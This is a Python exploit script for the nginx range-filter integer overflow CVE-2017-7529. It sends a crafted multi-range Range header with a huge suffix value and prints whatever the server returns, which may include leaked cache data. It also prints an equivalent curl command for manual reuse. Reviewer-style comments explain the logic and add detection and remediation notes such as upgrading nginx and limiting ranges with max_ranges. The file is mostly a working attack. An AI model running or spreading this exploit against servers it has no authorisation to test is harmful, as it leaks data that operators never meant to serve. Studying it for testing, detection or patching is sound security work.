cve-2017-7529.py
# Exploit Title: Nginx Remote Integer OverFlow
# Date: 07/13/2017
# Exploit Author: Liam G
# Vendor Homepage: https://www.nginx.com/
# Software Link: https://nginx.org/download/nginx-1.13.2.zip
# Version: 1.13.2
# Tested on: Debian linux 9
# CVE : CVE-2017-7529
import requests
import logging
import sys
# Module-wide logger used by every function in this script.
log = logging.getLogger(__name__)
# INFO and above go to the root handler that basicConfig installs.
logging.basicConfig(level=logging.INFO)
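def send_http_request(url, headers=None, timeout=8.0):
    """Issue a GET request and return the response, or None on a handled error.

    Args:
        url: Address to request.
        headers: Optional mapping of extra request headers. When omitted, no
            extra headers are sent.
        timeout: Seconds to wait before giving up; passed to requests.get.

    Returns:
        The requests response object, or None when the request failed with
        one of the handled exceptions. The failure is logged.

    Note:
        Certificate verification and redirect handling are left at the
        requests defaults. With redirects followed, the status and Server
        header logged here may describe the final redirect target rather
        than the host named in *url*.
    """
    # A literal {} default is a single dict shared by every call; build a
    # fresh mapping per call instead.
    request_headers = {} if headers is None else headers
    try:
        response = requests.get(url, headers=request_headers, timeout=timeout)
    except requests.exceptions.SSLError:
        log.error("SSL error")
    except requests.exceptions.HTTPError:
        # NOTE(review): requests.get() does not appear to raise HTTPError
        # unless raise_for_status() is called; kept for compatibility.
        log.error("HTTP error")
    except requests.exceptions.Timeout:
        log.error("request Timed out")
    except requests.exceptions.ConnectionError:
        # Unreachable host, refused connection, DNS failure: report it here
        # rather than letting it surface as an unexplained error upstream.
        log.error("connection error")
    else:
        log.info(
            "status: %s: Server: %s",
            response.status_code,
            response.headers.get('Server', ''),
        )
        return response
    return None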
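def exploit(url):
    """Check *url* for the nginx range-filter integer overflow (CVE-2017-7529).

    Sends one plain GET to read Content-Length, then a second GET whose Range
    header carries two suffix ranges built from that length. A 206 reply whose
    body contains "Content-Range" is reported as vulnerable.

    Args:
        url: Address of the resource to test.

    Returns:
        None. The verdict is logged and the evidence is printed to stdout.

    Notes for whoever reads the output:
        * The verdict is a heuristic on the response shape. Confirm it against
          the server's actual nginx version and patch level.
        * The printed body may contain data from the server's cache that was
          never meant to be served. Handle the output as sensitive.
        * On the server side the request is visible as a Range header with two
          suffix ranges, one of them extremely large. Logging the Range header
          makes such requests searchable.
        * Remediation is on the server: upgrade to an nginx release that
          carries the vendor fix for this CVE. The `max_ranges` directive can
          restrict multi-range requests until then.
    """
    try:
        log.info("target: %s", url)
        baseline = send_http_request(url)
        if baseline is None:
            # send_http_request() returns None after logging a handled
            # failure; there is nothing to measure, so stop here instead of
            # failing on an attribute access.
            log.error("[-] No response from target, nothing to test")
            print("\n")
            return

        content_length = baseline.headers.get('Content-Length', 0)
        # The constants below are reproduced exactly as published; their
        # derivation is not shown in this file.
        bytes_length = int(content_length) + 623
        content_range = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length)

        # Printed for manual reproduction only and never executed here. The
        # URL is interpolated unquoted, so quote it before pasting the line
        # into a shell.
        curl_request = f"curl -H 'Range: {content_range}' {url}"
        print(curl_request)

        probe = send_http_request(url, headers={'Range': content_range})
        if probe is None:
            log.error("[-] No response to the range request")
            print("\n")
            return
        print(probe.text)

        # The original test was `A and B or headers`. `and` binds tighter
        # than `or`, and the headers mapping is non-empty for practically any
        # response, so every reachable host was reported as vulnerable.
        looks_vulnerable = probe.status_code == 206 and "Content-Range" in probe.text
        if looks_vulnerable:
            print("\n")
            print("-" * 60)
            print("proof of concept:".upper())
            print("-" * 60)
            print("\n")
            for header in probe.headers.items():
                print(header)
            print(probe.text)
            print("-" * 60)
            log.info("[+] Vulnerable to CVE-2017-7529")
            print("\n")
        else:
            log.info("[?] Unknown Vulnerable")
            print("\n")
    except Exception:
        # Still best-effort, but log.exception keeps the traceback so the
        # cause (for example a non-numeric Content-Length) is not hidden.
        log.exception("SOMETHING WENT WRONG")
        print("\n")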
if __name__ == '__main__':
    # Exactly one positional argument, the URL to test, is required.
    if len(sys.argv) == 2:
        url = sys.argv[1]
        exploit(url)
    else:
        # Wrong argument count: show usage and exit with a failure status.
        print("[*] %s <url>" % sys.argv[0])
        sys.exit(1)